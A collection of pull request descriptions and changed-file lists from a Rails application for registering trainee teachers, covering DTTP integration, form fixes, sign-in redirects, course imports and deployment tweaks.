spec/features/trainees/filtering_trainees_spec.rb
spec/lib/dttp/params/placement_assignment_spec.rb
spec/models/trainee_filter_spec.rb
spec/models/trainee_spec.rb

- https://trello.com/c/Wdnl7TdE/1126-s-check-stored-route-is-being-used
- Remove hardcoded `assessment_only` dttp_id and make it dynamic based on the trainee training route
- Add codesets for `dfe_routes` to use correct entity id for that training route
- Move training route enum list into a constant in `config` so it's in one place
- You'll need to test this via postman. Fire a request to `https://{{dttp_host}}/api/data/v9.1/dfe_routes` to get a list of all training routes and their ids or `https://{{dttp_host}}/api/data/v9.1/dfe_routes(route_id)` for more details on a specific route.

[1126] - Check stored training route is being used

---

app/lib/dttp/code_sets/grades.rb

https://trello.com/c/5bEQdwax/1207-the-supplied-reference-link-dfeclassofdegrees-is-invalid
This reverts #615 because we're getting `The supplied reference link -- /dfe_classofdegrees() -- is invalid` from `UpdateTraineeToDttpJob`.
We can't make any changes to the keys now that there are degree records already in prod with matching `grade` values. If we change them, then `CodeSets::Grades::MAPPING.dig(grade, :entity_id)` will not be able to find the matching value. This coupling is not ideal, so we may migrate Degree#grade to enum type later on.

Revert "Make captialisation consistent"

---

app/views/trainees/personal_details/edit.html.erb
app/views/trainees/programme_details/edit.html.erb
config/locales/en.yml

Added the hint text html into the translation file and made the year dynamic. 
The hint text date was being underlined on a users machine in a UR session. We were unable to replicate this but there was one section that wasn't underlined on their machine (Date trainee started). This change _could_ address this issue.
- Incorporated the hint text html into the translation file
- Made the year dynamic
https://rtt-review-pr-614.herokuapp.com/trainees/NnFmi4nUuxjKxXVJ4DBnFmvk/review-draft
- Unable to replicate the issue. Let me know if you are able to. There is a screenshot in the Trello ticket of the issue. The screenshots below are how they should look.
- Visit the sections in the screenshot below and check that the hint text is correct (programme details start and end date, and date of …

[1198] Add hint text to translation file and make the year dynamic 

---

app/views/pages/cookies.html.erb

Google Analytics cookies
Add GA cookies to cookies page
Visit `/cookies`

[1208] Add ga to cookies page

---

app/helpers/application_helper.rb
app/lib/dttp/code_sets/routes.rb
app/models/trainee.rb
app/views/trainees/new.html.erb
app/views/trainees/training_routes/_form_fields.html.erb
app/views/trainees/training_routes/edit.html.erb
config/initializers/training_routes.rb
config/locales/en.yml
config/settings.yml
config/settings/development.yml
config/settings/qa.yml
config/settings/review.yml
spec/features/trainees/creating_a_new_trainee_spec.rb
spec/models/trainee_spec.rb
spec/support/page_objects/trainees/new.rb

https://trello.com/c/gXEJ2d5X/1234-madd-early-years-undergraduate-basic-route
- Add `early_years_undergrad` to the trainee `training_route` enum
- Add 'Early years (undergrad)' option as a training route to the new trainee form and the edit training routes form
- Refactor the shared code in the new trainee form and the edit training routes form into a shared partial, and use the TRAINING_ROUTES_ENUM constant for consistency & maintainability
- Add mapping to send the correct route ID to DTTP
- Head to `trainees/new`
- Check that the option to create an 'Early years (undergrad)' trainee is there
- Select this option and check that the correct route is displayed on the page:
- Click the link to change the route and check that you are taken to the `trainee/:trainee_slug/training_routes/edit` …

[1234] Add basic early years (undergrad) route

---

spec/factories/trainees.rb

- At the moment, providers need to verify a date when withdrawing or deferring trainees. Faker does not match this when creating dummy data if trainees state is deferred or withdrawn, and thus no date is shown underneath the Withdrawn/Deferred status on dummy trainees.
- Inside `trainees.rb` and inside the traits `:withdrawn` and `:deferred`, I have Faked a `withdraw_date` and `defer_date` respectively
- Navigate to the any trainee whos state is either `Deferred` or `Withdrawn` and whos details have been provided by Faker (not manually inputted, that is) and you should now see the date shown below.

[1248] Faker fakes dates for trainees deferred or withdrawn

---

app/controllers/trainees/diversity/ethnic_backgrounds_controller.rb
spec/features/trainees/diversities/diversity_progress_spec.rb
spec/features/trainees/diversities/edit_ethnic_group_spec.rb
spec/support/features.rb
spec/support/features/diversity_steps.rb
spec/support/page_objects/trainees/diversities/confirm_details.rb

- https://trello.com/c/2Q0wgbQg/1227-change-ethnicity-also-takes-the-user-through-the-disability-forms
- Return to last origin page if they have come from the diversity confirm otherwise resume normal flow
- Fill out a trainee's diversity details. Go back into the section to change ethnic group/background and submit. Assert you're taken back to the confirm page

[1227] Redirect to origin page when editing ethnic group/background

---

lib/tasks/example_data.rake

https://trello.com/c/DIshqJdy/1271-exampledata-rake-task-not-creating-provider
* used faker to add 3 characters alphanumerical code to Provider in example_data task
* When testing in review on heroku, persona login should work now

[1271] fixed example_data rake task, Provider needs code

---

app/controllers/trainees/personal_details_controller.rb

We have been excluding British and Irish from the autocomplete list as there are separate checkboxes for these nationalities. We want to show all nationalities in the autocomplete list so it works both ways.
- Autocomplete list renders all nationalities
- Pull down the code (the review app is currently not working: https://trello.com/c/DIshqJdy/1271-exampledata-rake-task-not-creating-provider)
- Navigate to personal details and scroll down to nationalities 
- Click other
- Check that British and Irish appear in the list

[1247] Add british and irish into autocomplete list

---

app/components/header/view.html.erb
app/components/start_page_banner/style.scss
app/views/layouts/application.html.erb
config/settings.yml
config/settings/development.yml
config/settings/production.yml
config/settings/review.yml
config/settings/sandbox.yml
config/settings/staging.yml
config/settings/test.yml

Visually see different environments
- Use a different colour for qa, staging, review and sandbox
You can change the value in `config/settings.yml`

[1252] Update header colours for different environments

---

Dockerfile
lib/tasks/migrate_swallowing_concurrent_migration_exceptions.rake

These happen a lot as we run the migrations on each instance that we
deploy too. 
They're not useful. Ignore them.
We do this in TTAPI and Apply.

[1280] Ignore concurrent migration errors

---

app/jobs/defer_job.rb
app/jobs/reinstate_job.rb
app/lib/dttp/params/dormancy.rb
app/services/dttp/create_dormancy.rb
app/services/dttp/update_dormancy.rb
db/migrate/20210312135246_add_dormancy_dttp_id_to_trainees.rb
db/schema.rb
spec/factories/trainees.rb
spec/jobs/reinstate_job_spec.rb
spec/lib/dttp/params/dormancy_spec.rb
spec/services/dttp/create_dormancy_spec.rb
spec/services/dttp/update_dormancy_spec.rb

- https://trello.com/c/QThGgrUa/1265-m-add-extra-params-for-defer
- Create a new `Dttp::Params::Dormancy` params class
- Create two new services to create and update a trainee's dormancy when deferring/reinstating
You'll have to test this with local DTTP access.
- Prepare a trainee locally and in DTTP such that they have a TRN and are ready for a deferral
- Run `Dttp::CreateDormancy.call(trainee: trainee)` in the console passing in the trainee to create a dormancy
- Query that trainee's `dfe_dormantperiods(dormancy_dttp_id)` in postman and assert the correct deferral DTTP properties (found in Dttp::Params::Dormancy are set in the response
- Reinstate the trainee using `Dttp::UpdateDormancy.call(trainee: trainee)` and assert the `dfe_datereturnedtocourse` dttp property is set.
You can also …

[1265] - Add extra params for Defer

---

terraform/workspace-variables/audit.tfvars

The `worker_app_stopped ` argument is currently set to `false` for Audit app's worker instance, but needs to be set to `true` i.e. the worker app should not be running.
set paas_worker_app_stopped    = `true` in the audit.tfvars file

Set Audit worker app to stop

---

app/controllers/sessions_controller.rb
app/models/provider.rb
app/models/user.rb
config/locales/en.yml
db/migrate/20210315141417_add_index_to_dttp_id.rb
db/schema.rb
spec/models/provider_spec.rb
spec/models/user_spec.rb

https://trello.com/c/ePAdh5Nn/1250-validate-uniqueness-of-dttpid-on-providers-and-users
* Adds unique db constraint to provider and user model 
* Adds validations with custom error message
* Add model specs
Might need to reset db if you have duplicated dttp ids

[1250] Validate uniqueness of dttpid on providers and users

---

.github/workflows/build.yml
Dockerfile

Current docker image size is about ~`750MB`
This change brings it down to ~`390MB`
Remove build time postgres dependencies, keep only `libpq`
Remove gem and yarn cache files.

Reduce docker image size

---

app/views/trainees/personal_details/edit.html.erb

There is a typo in the date of birth hint text translation and it isn't displaying correctly. This addresses the problem
- Fix typo 
- Visit `Date of Birth` within `personal details` and check that the hint text is correct.

[1285] Fix Date of Birth Hint Text translation

---

app/jobs/teacher_training_api/import_courses_job.rb
app/jobs/teacher_training_api/import_provider_courses_job.rb
app/lib/teacher_training_api/client.rb
app/models/course.rb
app/models/provider.rb
app/services/teacher_training_api/import_course.rb
app/services/teacher_training_api/retrieve_courses.rb
config/settings.yml
config/settings/development.yml
config/sidekiq_cron_schedule.yml
db/migrate/20210310134947_create_courses.rb
db/schema.rb
spec/factories/courses.rb
spec/jobs/teacher_training_api/import_courses_job_spec.rb
spec/jobs/teacher_training_api/import_provider_courses_job_spec.rb
spec/models/course_spec.rb
spec/models/provider_spec.rb
spec/services/teacher_training_api/import_course_spec.rb
spec/services/teacher_training_api/retrieve_courses_spec.rb
spec/support/api_stubs/teacher_training_api.rb

https://trello.com/c/nPORPb0g/1232-m-retrieve-courses-from-ttapi
This PR:
- Adds a scheduled job `TeacherTrainingApi::CreateCoursesJob` which is currently set to run every day 2am.
- Unless the feature flag is on, this does nothing.
- If the feature flag is on, the job fans out to one job per provider (currently all providers):
-  Adds a job `TeacherTrainingApi::CreateProviderCoursesJob` which takes a provider, and retrieves all of their courses from TTAPI via new service `TeacherTrainingApi::RetrieveCourses`
- It then iterates over these returned course objects and find-or-creates a course for the provider via new service `TeacherTrainingApi::CreateCourse`.
- Adds this new model `Course`, which currently only has a `name` and a `provider_id`
- You can test each of the services manually …

[1232] Create courses from TTAPI

---

app/helpers/application_helper.rb

Unless a text field is collecting paragraph like English word responses, we should disable spellcheck.
- Add an extra argument on the `form_with` method to disable spell check by default
- Navigate to a few text fields and check that spell check is not active.

[1256] Disable spell check by default

---

app/controllers/errors_controller.rb
spec/controllers/errors_controller_spec.rb

- [This trello ticket](https://trello.com/c/dzXQbcxr/1255-suppress-flash-messages-on-error-pages)
- `before_action` created in the `ErrorsController` that will clear flash messages. This means that you will never see a flash message on an error page, success or not, as flash messages will conflict with messages on error pages. 
- Run the test suite (errors_controller_spec.rb). 
- If you want to simulate the problem, create a flash message in the `internal_server_error` method (for example, `flash[:success] = "This was a success!"` and navigate to `https://localhost:5000/500` to see the flash message. Any flash messages given to the controller will be cleared with the before action unless you hard code it.

[1255] Suppress flash messages on error pages

---

app/components/start_page_banner/style.scss

https://user-images.githubusercontent.com/3441519/111639957-9dd95200-87f3-11eb-87a1-d7427c2234c6.mp4
https://user-images.githubusercontent.com/3441519/111637958-cbbd9700-87f1-11eb-9ec8-99762d63b6db.mp4

Focussed links in start banner have poor contrast (A11Y issue)

---

app/components/trainees/confirmation/trainee_id/view.rb
app/components/trainees/confirmation/trainee_start_date/view.rb
app/controllers/trainees/start_dates_controller.rb
app/controllers/trainees/trainee_ids_controller.rb
app/forms/trainee_id_form.rb
app/forms/trainee_start_date_form.rb
app/services/form_store.rb
config/locales/en.yml
spec/components/trainees/confirmation/trainee_id/view_preview.rb
spec/components/trainees/confirmation/trainee_id/view_spec.rb
spec/components/trainees/confirmation/trainee_start_date/view_preview.rb
spec/components/trainees/confirmation/trainee_start_date/view_spec.rb
spec/forms/trainee_id_form_spec.rb
spec/forms/trainee_start_date_form_spec.rb
spec/forms/training_details_form_spec.rb
spec/support/page_objects/trainees/edit_trainee_id.rb
spec/support/page_objects/trainees/edit_trainee_start_date.rb

https://trello.com/c/rPTLRvuZ/1203-s-implement-save-on-confirm-trainee-progress
Implements save-on-confirm functionality for the Trainee progress section, i.e. the 'Trainee ID' and the 'Trainee start date' here:
- Similar to the changes made https://github.com/DFE-Digital/register-trainee-teachers/pull/648
- Split `TrainingDetailsForm` into `TraineeIdForm` and `TraineeStartDateForm` so that the booleans `validate_trainee_id` and `validate_commencement_date ` go away.
- This makes the form compatible with the `ConfirmDetailsController` which calls `form_klass.new(trainee)` to create the forms.
- The combined 'Trainee start date and ID' form uses the old `TrainingDetailsForm`. This does not include any `FormStore` stashing since it's only used for draft trainees.
**Draft trainee**
- Visit a …

[1203] Implement 'save on confirm' for training details

---

app/models/trainee.rb
spec/controllers/trainees/confirm_reinstatements_controller_spec.rb
spec/models/trainee/state_transitions_spec.rb

- [Trello link](https://trello.com/c/CzfeE3tA/1254-bug-re-un-deferring-trainees-when-trn-is-received-after-deferral)
- If a trainee is submitted for TRN, a job is opened requesting a TRN for said trainee
- The trainee may be deferred when waiting for their TRN 
- The TRN is returned, and the bug is that the trainee is undeferred and put into `trn_received` state. 
- We want to keep the `deferred` state, but still register the TRN
- There is a similar problem with `withdrawn`, but instead of a state change, we get a state transition error (which is fine, but we also want to record the TRN)
- Conditional statement before the `receive_trn!` state change is checking that the trainee is not in a `deferred` or `withdrawn` state, insuring that the state change or raised transition error is …

[1254] (Bug) Undeferring trainees when trn is received after deferral 

---

app/webpacker/packs/application.js
package.json
yarn.lock

https://trello.com/c/lofoBlCW/1186-bug-conditional-fields-not-opening-in-ie11
- Add babel-polyfill to fix JavaScript exception in IE11
When babel converts ES6 to ES5, it creates a helper function called `_toConsumableArray()`. This blows up because IE11 doesn't have the necessary polyfills.
As you can see in the screen scapture shows JS behaviour is working now. Feel free to try it out in a real IE11 browser.

[1186] Add babel-polyfill to fix JavaScript exception in IE11

---

app/components/trainees/sort_links/view.rb

We implicitely default to sorting the trainee records by the date updated and on first visit, the sort link for this is shown as active. When you filter, it loses this styling even though the scope is still sorted by date updated.
This PR fixes the above. The component previously checked for `nil` which always built the default sort (`Date updated`) as a link. Changed to check with `blank?` as the query string IS in the url but it's empty.
Head to the trainee records, filter the results and assert the "Date updated" sort label is still shown as active.

[1276] Fix visual styling for default sort

---

spec/factories/trainees.rb

Format is the shortened year plus a sequenced int
eg: 20/21-123
https://trello.com/c/yy8pnlTa/1251-s-change-data-used-in-seeds-for-trainee-ids-to-be-alphanumeric
For manually checking this: run `bundle exec rake example_data:generate`

[1251] Change trainee ids to be alphanumeric

---

app/controllers/application_controller.rb
app/controllers/sessions_controller.rb
spec/controllers/sessions_controller_spec.rb
spec/features/authentication_spec.rb

- [Trello ticket](https://trello.com/c/ARJr6uyX/1258-m-if-redirected-to-sign-in-after-sign-in-users-should-be-returned-to-the-page-they-requested)
- Currently, if users direct themselves to a path via a hyperlink or manually putting it in the search bar and they are not logged in, they will be redirected to sign in, and then redirected back to home/root page ("/"). 
- We want the original search query to be saved in the session and then loaded on redirect after the sign in, and then deleted off the session. 
- New `save_redirect_path` method in application controller
- `save_redirect_path` will be called on unsuccessful authentication, along with a `redirect to sign_in_path`
- `save_redirect_path` will save the path in `session[:redirect_back_to]` for further use
- On successful …

1258 if redirected to sign in after sign in users should be returned to the page they requested

---

app/helpers/application_helper.rb
app/lib/dttp/code_sets/routes.rb
app/lib/training_route_manager.rb
app/models/trainee.rb
app/views/trainees/training_routes/_form_fields.html.erb
config/initializers/training_routes.rb
config/locales/en.yml
config/settings.yml
config/settings/development.yml
config/settings/qa.yml
config/settings/review.yml
spec/components/trainees/confirmation/placement_details/view_preview.rb
spec/components/trainees/confirmation/placement_details/view_spec.rb
spec/factories/trainees.rb
spec/features/trainees/creating_a_new_trainee_spec.rb
spec/features/trainees/edit_trainee_training_route_spec.rb
spec/features/trainees/filtering_trainees_spec.rb
spec/lib/training_route_manager_spec.rb
spec/models/trainee_spec.rb
spec/support/page_objects/trainees/edit_training_route.rb
spec/support/page_objects/trainees/index.rb
spec/support/page_objects/trainees/new.rb
spec/views/trainees/review_draft/show.html.erb_spec.rb
spec/views/trainees/show.html.erb_spec.rb

https://trello.com/c/tLSW3ieX/1309-s-rename-providerled-to-providerledpostgrad
Rename all instances of `provider_led` to `provider_led_postgrad` and all strings to "Provider-led (postgrad)" (via locales).
Since there will be other routes which start with `provider_led`, we've done a 'full' rename in the code rather than just changing the translation to fix things visually.
🚢

[1309] Rename Provider-led to Provider-led (postgrad)

---

app/services/dttp/placement_assignment.rb
app/services/dttp/placement_assignments/fetch.rb
spec/services/dttp/placement_assignment_spec.rb
spec/services/dttp/placement_assignments/fetch_spec.rb

https://trello.com/c/Ky3W4nNo/1239-m-retrieve-placement-assignment
* New Dttp::PlacementAssignments::Fetch service that makes request to the dfe_placementassignment entity in DTTP and retrieves all fields
* Response body is converted to JSON ruby hash and then fed into new Dttp::PlacementAssignment Ruby class
* Methods defined in new class access Dttp fields in JSON ruby hash
* Test of service with mock token, request and response. Unit test for Dttp::PlacementAssignment class. 
Use Postman to retrieve dttp_id from placement assignments field, e.g "dfe_placementassignmentid". In rails console Dttp::PlacementAssignments::Fetch.call(dttp_id: dttp_id) . As the method returns Dttp::PlacementAssignment object, you can then you can query the object returned using the methods defined in that …

[1239] Retrieve placement assignment

---

app/lib/dttp/params/contact.rb
app/views/trainees/degrees/_uk_degree_form.html.erb
spec/lib/dttp/params/contact_spec.rb

- https://trello.com/c/tSK65Pzc/1356-ethnic-background-bug
Fixes this sentry error https://sentry.io/organizations/dfe-bat/issues/2198667894/?project=5552118&referrer=slack
- You can just test the service that calls DTTP for this PR as the issue was that a `nil` value was being sent
- Prepare a trainee to be submitted but choose not provided for the ethnic group.
- Fire the service manually `Dttp::RegisterForTrn.call(trainee: trainee, trainee_creator_dttp_id: trainee_creator_dttp_id)` in your console and assert this method https://github.com/DFE-Digital/register-trainee-teachers/blob/master/app/lib/dttp/params/contact.rb#L64 returns an entity id and not `nil`

[1356] Fix ethnic background bug

---

app/components/task_list/view.rb
app/controllers/trainees/diversity/confirm_details_controller.rb
app/forms/diversities/disability_disclosure_form.rb
app/forms/diversities/disclosure_form.rb
app/forms/diversities/ethnic_background_form.rb
app/forms/diversities/ethnic_group_form.rb
app/forms/diversity_form.rb
app/helpers/diversities_helper.rb
app/views/trainees/review_draft/show.html.erb
spec/components/trainees/confirmation/reinstatement_details/view_spec.rb
spec/factories/trainees.rb
spec/features/trainees/diversities/edit_disabilities_spec.rb
spec/features/trainees/diversities/edit_disability_disclosure_spec.rb
spec/features/trainees/diversities/edit_ethnic_background_spec.rb
spec/features/trainees/diversities/edit_ethnic_group_spec.rb
spec/forms/diversities/disability_detail_form_spec.rb
spec/forms/diversities/disability_disclosure_form_spec.rb
spec/forms/diversities/ethnic_background_form_spec.rb
spec/forms/diversities/ethnic_group_form_spec.rb
spec/forms/diversity_form_spec.rb
spec/helpers/diversities_helper_spec.rb

https://trello.com/c/2JyE3W7F/1304-fix-diversities-bug
- A new helper method to compute the correct path for the "Diversity information" link on the review draft page. It ensures the user finishes what they started
- Updated the diversity forms so that they know how to wipe all the data from the DB if the user decides to change their mind and not disclose diversity information later on
- Fix an unrelated Capybara warning
- Create a new trainee
- Click the diversity information link
- Choose "Yes" to share diversity information
- Go back to the revew draft page
- Click the diversity information link
- You should now be directly taken to the last page you didn't enter and submit any information
- Try this out on a number of diversity form pages
- Click the diversity information link and …

[1304] Fix diversities confirmation bug

---

app/controllers/sessions_controller.rb
config/settings.yml
config/settings/development.yml
spec/config/settings_spec.rb
spec/controllers/sessions_controller_spec.rb

https://trello.com/c/Oq7hCz8U/1367-remove-the-user-creation-in-the-sessions-controller
Deleting the code around creating a user, which has only been used in development, and seems to work pretty well without, since we use personas, which can be populated by using the [seed rake task](https://github.com/DFE-Digital/register-trainee-teachers#setting-up-seed-records)

[1367] Remove user creation feature in the sessions controller

---

app/controllers/trainees/confirm_deferrals_controller.rb
app/controllers/trainees/confirm_reinstatements_controller.rb
app/controllers/trainees/confirm_withdrawals_controller.rb
app/controllers/trainees/qts_recommendations_controller.rb
app/controllers/trn_submissions_controller.rb
app/jobs/defer_job.rb
app/jobs/recommend_for_qts_job.rb
app/jobs/register_for_trn_job.rb
app/jobs/reinstate_job.rb
app/jobs/retrieve_qts_job.rb
app/jobs/retrieve_trn_job.rb
app/jobs/withdraw_job.rb
spec/controllers/trainees/confirm_deferrals_controller_spec.rb
spec/controllers/trainees/confirm_reinstatements_controller_spec.rb
spec/controllers/trainees/confirm_withdrawals_controller_spec.rb
spec/controllers/trainees/qts_recommendations_controller_spec.rb
spec/controllers/trn_submissions_controller_spec.rb
spec/jobs/recommend_for_qts_job_spec.rb
spec/jobs/register_for_trn_job_spec.rb
spec/jobs/reinstate_job_spec.rb
spec/jobs/retrieve_qts_job_spec.rb
spec/jobs/retrieve_trn_job_spec.rb

- https://trello.com/c/vn4wSnvX/1368-pass-objects-to-jobs
Based on this comment https://github.com/DFE-Digital/register-trainee-teachers/pull/638#discussion_r592265750 and the ticket above. We no longer need to be explicit with passing around ids for model instances since https://github.com/rails/globalid .

[1368] Refactor job params to be consistent

---

app/jobs/teacher_training_api/import_courses_job.rb
app/models/subject.rb
app/services/teacher_training_api/import_subject.rb
app/services/teacher_training_api/retrieve_subjects.rb
db/migrate/20210324095637_create_subjects.rb
db/schema.rb
spec/factories/subjects.rb
spec/factories/trainees.rb
spec/jobs/teacher_training_api/import_courses_job_spec.rb
spec/services/teacher_training_api/import_subject_spec.rb
spec/services/teacher_training_api/retrieve_courses_spec.rb
spec/services/teacher_training_api/retrieve_subjects_spec.rb
spec/support/api_stubs/teacher_training_api.rb

https://trello.com/c/nJHVsjt5/1329-s-store-a-local-list-of-publish-subjects
This PR creates the following new services:
1. `TeacherTrainingApi::RetrieveSubjects` which gets all subjects from the API on `/subjects`
2. `TeacherTrainingApi::ImportSubject` which takes a subject as returned from `RetrieveSubjects` and stores a `Subject` locally (name and code). If we already have a subject with that code, we update the name.
This PR also includes the new model `Subject` and the associated migration. Attribute `code` is unique.
The new services are called from within `TeacherTrainingApi::ImportCoursesJob`, right before we fetch the courses. We need to ensure we have the most up to date list before calling the `ImportProviderCoursesJob`, since courses are soon to be joined up to subjects.
From …

[1329] Retrieve and store publish subjects

---

app/views/trainees/confirm_delete/show.html.erb
app/views/trainees/confirm_reinstatements/show.html.erb
app/views/trainees/confirm_withdrawals/show.html.erb
app/views/trainees/withdrawals/show.html.erb
config/locales/en.yml

https://trello.com/c/8nO4xkX2/1365-fix-inconsistant-use-of-i18n
https://github.com/DFE-Digital/register-trainee-teachers/pull/710
Fix due to the above PR.
* Change en.yml so "cancel" translates to "Cancel" and not "Cancel and return to record"
* Changed all pages that expected "Cancel and return to record" text to use key: "views.forms.common.cancel_and_return_to_record"

[1365] Fix expected translated cancel link text

---

.rubocop.yml
lib/rubocop/cop/register/register_form_with.rb

https://trello.com/c/Un8guBBc/1323-new-cop-for-our-registerformwith-helper
Adds a new check that catches any use of 'form_with' in views or components with the linter. Uses new Register module as different to Govuk, register_form_with method is defined in application helper
Check if form_with is caught in views or components when `bundle exec rake lint:erb` is run

[1323] Add cop for register_form_with

---

app/services/teacher_training_api/import_course.rb
spec/services/teacher_training_api/import_course_spec.rb

https://trello.com/c/kNelYLke/1382-m-store-level-in-courses
- Add another guard clause to `TeacherTrainingApi::ImportCourse#call` to prevent it from importing further education courses

[1382] Ignore further education courses from Publish API

---

app/components/trainees/timeline/view.rb
app/controllers/trainees/timelines_controller.rb
app/models/timeline_event.rb
app/services/trainees/create_timeline_events.rb
app/views/trainees/timelines/show.html.erb
config/locales/en.yml
spec/components/trainees/timeline/view_preview.rb
spec/components/trainees/timeline/view_spec.rb
spec/services/trainees/create_timeline_events_spec.rb

https://trello.com/c/nCFp6241/1325-s-add-timeline-entries-for-each-discrete-user-action
Instead of pulling out the audits for creating the trainee and the state changes for a trainee, map across _all_ audits and create timeline events for each one.
Some audits are treated differently to others:
- The trainee creation audit includes `audited_changes` for all trainee fields (setting most of them to `nil`). But we create just one `TimelineEvent` for this audit to mark the creation as a whole.
- The trainee state change audits include extra `audited_changes` for date fields (e.g. `defer_date`, `trn`). But we create just one `TimelineEvent` for this audit to mark the state the trainee transitioned to.
- All other audits are created from form submissions. They include multiple `audited_changes` …

[1325] Create timeline events for all audits

---

app/controllers/application_controller.rb
app/controllers/pages_controller.rb
app/controllers/sessions_controller.rb
spec/controllers/pages_controller_spec.rb
spec/controllers/sessions_controller_spec.rb

- [Trello ticket](https://trello.com/c/zaxZTVl7/1378-redirected-to-wrong-page-after-signing-in)
- Users were being re-directed to a different link (possibly one from a previous visit) instead of to the home page.
- User journey to re-create the bug is unclear/unknown. 
- Changed `original_fullpath` to `fullpath` for consistency around the app and with the logic in Apply, who share the redirect system. There is also [this answer](https://stackoverflow.com/questions/34033973/rails-4-what-is-the-difference-between-request-original-fullpath-and-request-f/34034054#answer-52605696:~:text=I'd%20like%20to%20add%20original_fullpath%20ignores,end) which mentions `fullpath` includes redirects.
- `session[:requested_path] = root_path` in pages controller. Fallback to if the user directs themselves to …

[1378] User redirected to wrong link after sign in 

---

app/services/trainees/create_timeline_events.rb

A couple of trainee fields (`trainee_id`, `training_route`) were missing from the 'allowed' list for the timeline, meaning that they didn't show up as entries.
This PR adds them.
🚢

Add trainee ID and training route to timeline

---

terraform/modules/paas/main.tf
terraform/modules/paas/variables.tf

To ensure that we ignore concurrent migration errors as implemented in
https://github.com/DFE-Digital/register-trainee-teachers/pull/659
by running (rails db:migrate:ignore_concurrent_migration_exceptions)
https://trello.com/c/vyNuP9k5/1432-ignore-concurrent-migration-errors
These errors appear as the default Dockerfile command, which incorporate the `ignore_concurrent_migration_exceptions` rake task, seem to be overridden by manually specifying the boot command.
Fallback to the [default command in Dockerfile](https://github.com/DFE-Digital/register-trainee-teachers/blob/1f7d0b914be4b8c471ee6b77d650ae5ed56b7fb3/Dockerfile#L34)
Similar to https://github.com/DFE-Digital/register-trainee-teachers/pull/659, We do this in TTAPI and Apply.

[1432] Ignore concurrent migration errors

---

app/helpers/diversities_helper.rb
db/schema.rb
spec/helpers/diversities_helper_spec.rb

- [Trello card](https://trello.com/c/kXKYVULk/1389-after-diversity-section-is-completed-the-task-list-links-to-the-wrong-page)
- If a provider currently creates a trainee, fills out the diversity form and says the trainee *doesnt* have a disability, on re-visiting the link to the form we are directed to the "which disability" page rather than the confirm details page.
- The if else statement in `diversity_confirm_path` in `DiversitiesHelper` checks that if the trainee has no disability recorded, that they also are registered as disabled before linking them back to `edit_trainee_diversity_disability_detail_path`. 
- Create a new trainee and fill out the diversity information form. Ensure that when prompted if the trainee has a disability to select `They shared that they’re not disabled` or …

[1389] [Bug] After diversity section is completed, the task list links to the wrong page

---

app/components/task_list/view.rb
app/controllers/trainees/confirm_publish_course_controller.rb
app/controllers/trainees/publish_course_details_controller.rb
app/forms/publish_course_details_form.rb
app/helpers/trainee_helper.rb
app/models/trainee.rb
app/services/form_store.rb
app/services/teacher_training_api/import_course.rb
app/views/trainees/publish_course_details/edit.html.erb
app/views/trainees/review_draft/show.html.erb
config/locales/en.yml
config/routes.rb
config/settings/development.yml
db/migrate/20210401142502_add_summary_to_courses.rb
db/schema.rb
spec/components/task_list/view_spec.rb
spec/factories/courses.rb
spec/features/trainees/edit_publish_course_details_spec.rb
spec/forms/publish_course_details_form_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/sections/course_details.rb
spec/support/page_objects/trainees/publish_course_details.rb
spec/views/trainees/review_draft/show.html.erb_spec.rb

https://trello.com/c/p6yDzY9r/1311-l-course-details-page-with-publish-courses
- Adds the summary field to courses (used for copy to help identify courses)
- Adds a feature flag, which will how a list of courses to pick from rather than the manual form for entering course information. List of courses is filtered by trainee provider and training route.
- When the course picker is submitted, it redirects to a confirmation page including the course code (dummy page in this PR, completed in https://github.com/DFE-Digital/register-trainee-teachers/pull/738)

[1311] Course details page with publish courses

---

app/jobs/change_trainee_status_job.rb
app/jobs/create_or_update_consistency_check_job.rb
app/jobs/defer_job.rb
app/jobs/dttp/check_consistency_job.rb
app/jobs/recommend_for_qts_job.rb
app/jobs/register_for_trn_job.rb
app/jobs/reinstate_job.rb
app/jobs/withdraw_job.rb
app/services/dttp/contacts/fetch.rb
app/services/dttp/placement_assignments/fetch.rb
app/services/dttp/update_trainee_status.rb
spec/jobs/check_consistency_job_spec.rb
spec/jobs/recommend_for_qts_job_spec.rb
spec/jobs/register_for_trn_job_spec.rb
spec/jobs/reinstate_job_spec.rb
spec/services/dttp/contact_fetch_spec.rb
spec/services/dttp/placement_assignments/fetch_spec.rb
spec/services/dttp/update_trainee_status_spec.rb

The `CreateOrUpdateConsistencyCheckJob` requires a `trainee` object, but in [certain conditions](https://github.com/DFE-Digital/register-trainee-teachers/blob/6573d640e497f9c3dc93385c9b16a53f46c26ef0/app/services/dttp/update_trainee_status.rb#L36-L38), it could be receiving a `nil` value.
[Ticket](https://trello.com/c/5pyNNLo2/1442-nomethoderror-sidekiq-createorupdateconsistencycheckjob)
Ensure that we pass `trainee` to the job, by making sure the calling service, i.e: `Dttp::UpdateTraineeStatus` does not have to deduce it based on if it is a contact/placement_assignment entity type.
I've relied solely on the test suite, but perhaps someone with more context might have a better way of validating this.

[1442] Pass trainee to Dttp::UpdateTraineeStatus service

---

app/components/trainees/confirmation/confirm_publish_course/view.html.erb
app/components/trainees/confirmation/confirm_publish_course/view.rb
app/controllers/trainees/confirm_publish_course_controller.rb
app/forms/confirm_publish_course_form.rb
app/models/course.rb
app/views/pages/accessibility.html.erb
app/views/pages/data_requirements.html.erb
app/views/pages/home.html.erb
app/views/sign_in/index.html.erb
app/views/sign_in/new.html.erb
app/views/trainees/confirm_publish_course/edit.html.erb
app/views/trainees/not_supported_route.html.erb
app/views/trainees/publish_course_details/edit.html.erb
app/views/trainees/review_draft/show.html.erb
config/locales/en.yml
config/routes.rb
db/schema.rb
spec/components/trainees/confirmation/confirm_publish_course/view_preview.rb
spec/components/trainees/confirmation/confirm_publish_course/view_spec.rb
spec/features/trainees/edit_confirm_publish_course_spec.rb
spec/features/trainees/edit_publish_course_details_spec.rb
spec/forms/confirm_publish_course_form_spec.rb
spec/models/course_spec.rb
spec/support/features/page_helpers.rb
spec/support/page_objects/trainees/confirm_publish_course.rb

https://trello.com/c/wFjZXhab/1312-m-publish-course-details-confirm-page
Should be merged after https://github.com/DFE-Digital/register-trainee-teachers/pull/731
* View page for confirming publish course
* Component to show course info
* Add new trainee, choose "Provider led (postgrad)" path, add course details, choose one from list.

[1312] publish course details confirm page

---

app/jobs/apply_api/import_applications_job.rb
app/lib/apply_api/client.rb
app/models/apply_application.rb
app/models/apply_application_sync_request.rb
app/models/provider.rb
app/services/apply_api/import_application.rb
app/services/apply_api/retrieve_applications.rb
app/services/teacher_training_api/retrieve_courses.rb
config/settings.yml
